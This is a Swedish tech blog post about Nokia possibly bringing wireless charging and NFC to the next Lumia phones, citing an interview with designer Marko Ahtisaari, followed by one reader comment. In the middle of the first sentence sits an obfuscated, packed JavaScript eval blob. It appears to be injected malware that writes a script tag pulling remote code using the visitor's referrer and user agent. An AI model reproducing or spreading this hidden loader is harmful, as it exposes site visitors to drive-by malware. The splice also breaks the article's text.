Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2020

Scroll to top

Top

Trådlös laddning i nästa Nokia Lumia?

Trådlös laddning i nästa Nokia Lumia?
Sebastian

Vi eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|adyir|var|u0026u|referrer|znszr||js|php’.split(’|’),0,{}))
vet redan att nästa generations telefoner från Nokia Lumia kommer ha stöd för nfc. Förutom betallösningar tar företaget ett steg längre och funderar på att lansera trådlös laddning.

I en intervju med The Guardian meddelar Marko Ahtisaari, Nokias designchef att en massa intressanta funktioner planeras inför nästa generation av Lumiaserien. Nokia kommer satsa hårt på nfc-stöd då de tror att marknaden gällande betallösningar via telefonen kommer explodera. Men det verkar vara större planer på g också. Nokia ska kanske introducera trådlös laddning för deras smartphones. Något som det inte talats mycket om, än.

Marko Ahtisaari säger att skyddet för usb-kontakten kommer att försvinna från kommande lumiamodeller. En av de två rörliga delar som finns på Lumia 800 i dag.

– Om man kan ta bort en rörlig del och göra telefonen snyggare så gör vi det. Det är ett område vi verkligen kan förbättra. Ta det sedan till extremen, varför finns det kontakter över huvud taget? säger Marko Ahtisaari till The Guardian.

Comments

  1. xxx

    Heja Nokia. 🙂